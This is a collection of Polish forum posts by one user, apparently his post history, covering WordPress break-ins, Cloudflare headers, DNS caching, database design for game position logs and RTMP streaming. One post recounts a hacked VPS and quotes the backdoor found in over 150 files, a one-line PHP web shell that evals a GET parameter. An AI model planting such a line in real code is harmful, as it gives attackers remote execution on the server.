Misiek08

WordPress. Nie wiem dokładnie jaką podatność wykorzystują nowe ataki, jednak ja ostatnio w ciągu 3 dni "dostałem" 30 plików, które zawierały w sobie shella. Mój serwer wysłał w ciągu doby 90k e-maili po czym dostałem kilka ciekawych maili i dopiero zareagowałem. Co najciekawsze atak uderzył w prywatnego bloga, którego aktualizowałem, ale praktycznie nikt na niego nie wchodził. Sprawdź pliki .htaccess, dopisz wszelkie regułki, które w internecie znajdziesz, a szczególnie te, które blokują wykonywanie PHPa z katalogów wtyczek JS. U mnie najwięcej syfu było w podkatalogach TinyMCE.

Przypominam o tym, że Twój serwer nie widzi prawidziego IP użytkownika w standardowych nagłówkach. IP użytkownika jest ukryte w CF-Connecting-IP. Co prawda IP jest w X-Forwarded-For, ale dopisane, więc nie koniecznie każdy skrypt sobie poradzi. Więcej informacji na ten temat tutaj: https://support.cloudflare.com/hc/en-us/articles/200170986-How-does-CloudFlare-handle-HTTP-Request-headers-

Czyli zmieniamy z DC na CC. DataCenter -> CrapCenter

To chyba aktualny temat dla webh.pl, bo innego nie znalazłem ze świeższymi postami.

Może teraz jak ich Orange wciągnęło to ktoś w końcu otworzył cfg DNSów i zmienił domyślny czas cache na jakąś ludzką wartość

Ustaw sobie DNSy na np. Google'owskie, czyli: 8.8.8.8, 8.8.4.4. Zrobisz to we właściwościach połączenia sieciowego. Nic nie popsuje, a rekordy DNS będziesz miał zawsze po 20-30 minutach, a nie jak np. w TP po 12-24h.

Witam! Szukam pomysłu (lepszego niż mój aktualny) na zapisywanie danych o graczu. Potrzebuje zapisać współrzędne na których znajdował się gracz i chcę to mieć zapisane jako historię x ostatnich pozycji. Aktualnie wpadłem, by na każdą postać tworzyć tabelę w MongoDB jako "capped collection". Limit rozmiaru ustawiam kosmiczny, a limit dokumentów (opcja max) na zadaną wartość (100 000). Jest jakaś baza, która będzie lekka, będzie miała klientów w PHPie, node.js i najlepiej C++ i będzie obsługiwała klastrowanie (nie musi być master-master, potrzebuje tylko mieć możliwość zapisywania bez martwienia się o rozrzucanie danych po node'ach).

Właśnie myślę o tym, żeby zrobić bazę nie do końca poprawnie, ale po prostu tworzyć tabelę dla każdego profilu. Wtedy mam maksymalnie 100 000 rekordów w 1 tabeli, a do tego TokuDB teoretycznie zajmuje mniej miejsca niż innoDB. Pytanie czy MySQL poradzi sobie z 30 000 tabel?

Czy to będzie lżejsze niż Mongo? Ogólnie chciałbym zrobić to w taki sposób, żeby nie martwić się o te "stosy". Wiem, są triggery Czekam na dalsze propozycje, a przy okazji (za jakiś miesiąc) przetestuję PostgreSQL, bo do takiego zastosowania nie widziałem jego kandydatury. Myślałem też przez chwilę o TokuMX i TokuDB. Jest sens?

Może.

Jeżeli pytasz o stronę fupptv.pl to wiem. Jeżeli pytasz ogólnie o całą stronę którą podałeś to wykorzystuje ona kod embed ze strony fupptv.pl. Nic nadzwyczajnego tam nie ma W razie dalszych, bardziej szczegółowych pytań zapraszam na PW.

Przeglądałem ostatnio WHT i parę innych for na telefonie i łapie mnie kur**ca jak widzę dłuższą stopkę niż post. Najgorsze, że w tematach, które najczęściej szukam jest tak, że treść krótsza niż stopka jest właśnie tą poszukiwaną. Ja osobiście stopce Taptalka mówię NIE.

Ostatnio miałem problem z wysyłaniem maili z VPSa. Na serwerze miałem uruchomione wiele usług, które sobie pracowały bez problemów, więc nawet nie zaglądałem. Któregoś dnia dostałem mail, że dysk się zapełnił. Wchodzę, a tam kolejka 20 miliardów odroczonych maili i IP już trafiło na 2 RBL. Dziura? Gdzieś w WordPressie. W ponad 150 plikach dodanych rootkit/shell. Kod w stylu <?php eval($_GET['asdqg8f0g']); ?>. Z gotowej paczki WP porównałem MD5, poleczyłem pliki i teraz czekam na powtórkę sytuacji. W starych logach nic nie widzę, bo okazało się, że problem był od ponad miesiąca, a tylko z takiego czasu mam access.log'a, więc nie wiem po jakim requeście zaczęło się spamowanie. Hasła - poziom supertrudny.

Dla każdego osobny. Do tego trzeba na stronie internetowej mieć skrypt dodatkowy. Czysty HTML tutaj nie da rady, bo nawet w JS nie mamy dostępu do adresu IP klienta (można to też minąć) - jednak w JS główny klucz przy szyfrowaniu byłby widoczny, więc typowo musi robić to skrypt.

Jeżeli chcesz mieć świetny obraz bez żadnych cięć to 2Mbps na pełne 720p. Polecam do takich zastosowań kilka tanich maszynek zamiast jedną, ale drogą. Rozłożenie ruchu + mniejsza awaryjność (nie masz 1 punktu, który może paść).

Szkoda, że nie 3 dni temu, ale i tak dobrze W takim razie nic już chyba więcej się nie da zrobić, bo cała reszta działa świetnie.

Secure link odpowiednio użyty też jest dobrym zabezpieczeniem. Trzeba tylko przez chwilę pomyśleć "jak?".

Ja wiem, że jest niedostępny, więc taka moja sugestia co można jeszcze poprawić.

Tylko gdybyście przywrócili PayPal'a to wszystko byłoby na 6+.

Przepraszam, czy nie przypadkiem 18 446 744 073 709 551 616. Może te 384 rekordy zrobią różnicę!

Witam! Mam nietypowy problem i ciężko mi było dopasować dział. Potrzebuję kontakt do osoby, która posiada licencję XFS, ale z modułem "100% download mod". Robię swój system przechowywania plików (coś jak S3) i chciałem zobaczyć, czy dałoby się spiąć zmodowany przeze mnie nginx z XFS'em, bo nie ukrywam, że dla wielu osób z XFS mój system może okazać się bardzo ciekawy.

Tylko zużycie procesora i RAMu przez Red5 jest niewyobrażalnie większe niż np. nginx'a z modułem rtmp. Oczywiście wiem, że Red5 pozwala na dużo więcej "na miejscu", czyli edycja kodu lub dodawanie pluginów, ale to już zależy czy idziemy w łatwą obsługę nie patrząc na zasoby, czy zacieśniamy.

Ja mam to np. spięte unikalnym tokenem + ID użytkownika z IP. Można zabezpieczyć w dowolnym sposób.

Transakcja przebiegła w 100% pomyślnie i szybko. Polecam na przyszłość!

Masz takie rzeczy jak on_connect, on_play i on_done. Dzięki temu możesz dowolnymi skryptami autoryzować połączenia do serwera. Dla Ciebie polecałbym on_play, bo masz w nim wszystkie dane (kto i do czego się podłączył). Zwracając kod HTTP z zakresu 400-499, czyli np. 403 (Forbidden) blokujesz wejście i danej osobie nie wyświetli się stream, tylko czarność.